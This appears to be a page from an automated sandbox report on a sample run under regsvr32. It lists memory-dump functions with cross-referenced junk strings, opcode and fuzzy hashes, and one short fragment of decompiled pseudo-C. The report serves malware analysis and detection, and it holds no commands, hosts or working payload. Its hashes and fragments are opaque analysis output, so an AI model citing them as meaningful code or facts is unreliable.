Instruction Fuzzy Hash: 31512FB050070E8BDF58DF14C88A4DE3BA0FB68398F251619FC4A96295D378D999CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00743B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

%9, xrefs: 00743BB8
$, xrefs: 00743BFF

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$%9
API String ID: 0-3031553271
Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
Instruction ID: 8da8284ebe2c293df3f9b9f06114f1e2f3c91514f6672c6fe4aa680cd4022333
Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
Instruction Fuzzy Hash: 8D412B7061CB84ABD798DF19C0D962ABAE1FB88714F90592EF48AC7291C738C944CB47

Uniqueness

Uniqueness Score: -1.00%

Function 0073B07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

gd, xrefs: 0073B208
s=z, xrefs: 0073B235

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: gd$s=z
API String ID: 0-3301279615
Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
Instruction ID: aa5d7c152d57af9d6fdf1790f499a54eb2f6a576db5490730323eef403844c58
Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
Instruction Fuzzy Hash: F251E1B190030A8FDB48CF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 00736138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

!oW!, xrefs: 007362B0
ke&Q, xrefs: 007361EC

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !oW!$ke&Q
API String ID: 0-419570616
Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
Instruction ID: 94ae8c63bdf65f358bccd598a44367aab0c634bf02fdad99a01aca2e1709207e
Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
Instruction Fuzzy Hash: 2E51D7B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 00734758 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

?j|, xrefs: 007347F0
P, xrefs: 00734886

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ?j|$P
API String ID: 0-615948335
Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
Instruction ID: bf3e6e47079eaa0c3886aa4d205772bd04a7bb65d407afea62eee33333146ed0
Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
Instruction Fuzzy Hash: 7E41D3B090034A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00745880 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

%, xrefs: 007458E3
aI, xrefs: 007458CF

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %$aI
API String ID: 0-3604358270
Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
Instruction ID: 3f20e1a47833844578fbc524b0c5a2be334a7a5aad641c41bb80460401ca91be
Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
Instruction Fuzzy Hash: 0241D6B090038ACBCB48CF64C99A5DE7BB1FB48358F114A2DF82697350D3B49664CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00748A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

[, xrefs: 00748AF9
j, xrefs: 00748AB4

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: j$[
API String ID: 0-3696242357
Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
Instruction ID: 2b3c419e1e7376abbec55d31f3f0e59bb8af4c64e499347c8606597baa97e938
Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
Instruction Fuzzy Hash: 5E41D5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 0074C058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

S", xrefs: 0074C1A0
+ , xrefs: 0074C10B

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: + $S"
API String ID: 0-2880694137
Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
Instruction ID: 3997b0d77a3cbbce49aa6970110ff228252a62f11537e0b3de33ec13074dd8fd
Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
Instruction Fuzzy Hash: 5C51B5B090078ECFDF88DF64C88A5DE7BB0FB58354F10461DE866A6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0074B130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

=K, xrefs: 0074B23E
d%, xrefs: 0074B189

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =K$d%
API String ID: 0-2790768846
Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
Instruction ID: 8586ef3cd3dff81e7df8af4218970a7a4508d2f9ab316a06a662e4b3d9afc5bc
Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
Instruction Fuzzy Hash: 5741E4B090074E8BDF48CF64C88A5DE7BF0FB58358F104A1DE86AA6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 007395BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

#|, xrefs: 0073966C
`, xrefs: 007396B4

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #|$`
API String ID: 0-1687004633
Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
Instruction ID: c3e75afa0712d8ae90a2e539acd1e71a09905fb2a4a7a2646132e30fe0a2813c
Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
Instruction Fuzzy Hash: DC41D6B190078E8FDF48CF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0074C44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

c, xrefs: 0074C581
j~;, xrefs: 0074C5B3

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c$j~;
API String ID: 0-3832213246
Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
Instruction ID: 25ce31f5d98f68ca11bbea036d20606e4569f88ca1f7aa9c39b14acd2f253860
Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
Instruction Fuzzy Hash: 2141A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC6696250D3B89661CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 00737C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

-h, xrefs: 00737D15
W, xrefs: 00737C6A

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -h$W
API String ID: 0-4146498651
Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
Instruction ID: 9c874dd5da8a40f368f212b03d844fc60c651015905fe71f71fc8e3a665a1f6e
Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
Instruction Fuzzy Hash: 8041A4B590038EDFDB44CF68D88A5CE7BF0FB48358F114619F869A6250D3B49664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00758A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

fp, xrefs: 00758AC9
., xrefs: 00758A70

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .$fp
API String ID: 0-3298127435
Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
Instruction ID: 07b2940b05991023366ec3f3d37c25f508377fafc4968f84e53af630630fac74
Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
Instruction Fuzzy Hash: 7141F4B190470E8BDB88CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00738FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

", xrefs: 00738FC4
Zs, xrefs: 00738FCC

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "$Zs
API String ID: 0-3922668666
Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43

Uniqueness

Uniqueness Score: -1.00%

Function 00737840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

s [, xrefs: 00737898
XW, xrefs: 007378F9

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: XW$s [
API String ID: 0-2366283936
Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00734C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

jn(, xrefs: 00734D02
4V, xrefs: 00734D12

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4V$jn(
API String ID: 0-2529302498
Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0073F65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

%6, xrefs: 0073F74C
', xrefs: 0073F759

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '$%6
API String ID: 0-1852427169
Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43

Uniqueness

Uniqueness Score: -1.00%

Function 00738A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

J, xrefs: 00738AB1
uS, xrefs: 00738B32

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: uS$J
API String ID: 0-437994327
Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
Instruction ID: 932e051fa095f2452f9631590778fc2aece6e7424a24d942ca29929a088bb8e0
Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
Instruction Fuzzy Hash: D131C6B190034E8FDB84CF64C88A5DE7FB0FB28358F104619E859A6260D3B89695CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 00740A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

+@, xrefs: 00740B69
`.P, xrefs: 00740B2E

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +@$`.P
API String ID: 0-1189405855
Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00733CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

^, xrefs: 00733D00
R, xrefs: 00733D10

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^$R
API String ID: 0-3595634639
Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00732FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

w, xrefs: 0073305F
t^, xrefs: 00732FEB

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t^$w
API String ID: 0-1486493484
Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00741924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

#, xrefs: 00741BB3

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #
API String ID: 0-606707520
Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
Instruction ID: 4dd1cb3b4079214fceea326a174ac78aac63e1fa506fb9bcebaf2a82943caac1
Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
Instruction Fuzzy Hash: F9223870D14709EFDB58DFA8C49A49EBBF1FF44348F40816DE80AAB290D7749A19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}

0x180008d28
0x180008d2d
0x180008d32
0x180008d56
0x180008d5d
0x180008d70
0x180008d91

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700

Uniqueness

Uniqueness Score: -1.00%

Function 00741030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

ef, xrefs: 007411CE

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ef
API String ID: 0-3522424648
Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
Instruction ID: e1ff52c46848180c9227c1d0c8807d2911c976523379978882354da15622395d
Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
Instruction Fuzzy Hash: E00218B0A04709EFDB58DF68C08959EBBF2FB44304F40816DE84AAB360D775DA59CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0073EF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

x]!-, xrefs: 0073F2E3

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: x]!-
API String ID: 0-585868058
Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
Instruction ID: 5b4d536fe385f5c0b14889ed56efff0f3569bab156a5faf58a890053aa4a1cc9
Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
Instruction Fuzzy Hash: 79D189B1A0060DCFDBA8CF78C54A5DD7BF1BB48308F606129E826AA2B6D7749905CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0074A8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

}^O, xrefs: 0074ABB5

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: }^O
API String ID: 0-3039680174
Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
Instruction ID: 67c0f23fd29af9def71624402dbd1979e55da75dccd8172f5820373a17c577f1
Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
Instruction Fuzzy Hash: 27A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00744D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

RH, xrefs: 00744D53

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: RH
API String ID: 0-2975065227
Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
Instruction ID: 5d7c4141c7ba739edcc02c79d247265394a425e43ae5a28859ffa4e70af1ed33
Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
Instruction Fuzzy Hash: 0451187111C7448FC7A8DF18D4C66AAB7E0FB94310FA0991DE8CEC7251DF74A88A9B46

Uniqueness

Uniqueness Score: -1.00%

Function 0073BE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

Y, xrefs: 0073BEF2

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-579211002
Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
Instruction ID: 767c8bafb3f122f815eb64fbcb5c37a281c3f627f3bbe5dd6bd576d2f76ce603
Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
Instruction Fuzzy Hash: 4551F5715107898BDB59DF28C88A0DD3BA1FB4835CF425318FD8EA62A1D77CD845CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0073D6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

vOs, xrefs: 0073D8D7

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: vOs
API String ID: 0-1852020951
Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
Instruction ID: 62463a4996b39f7b395a9544c20fe865bde2d56aed95b0373e175d94b2f0c39d
Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
Instruction Fuzzy Hash: 20618DB190030ECFDB49CF68D48A5CE7FB0FB64398F204519E845A6260D7B996A8CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0073461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

*), xrefs: 00734691

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *)
API String ID: 0-1811957435
Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
Instruction ID: ca14b646306a201cbebf8859462843f9ceaed425e9293687db7a7dfae74d02d9
Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
Instruction Fuzzy Hash: 8D31933061CB888FC72CDF29D08556AB7E0FB99301F504A2EE58AC7365DB74D805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0073F77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

t, xrefs: 0073F7C6

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t
API String ID: 0-1935021737
Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
Instruction ID: 0e3b87161036056717c35a601d53e9d543cbe45ac87f3e7cd29bb7bbf1fa8cf4
Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
Instruction Fuzzy Hash: 27319F3061DB848FE768DF2CD48916ABBE0FB96340F104A6DE5CAC7266D770D805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0075181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

__, xrefs: 007518BC

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: __
API String ID: 0-2267946753
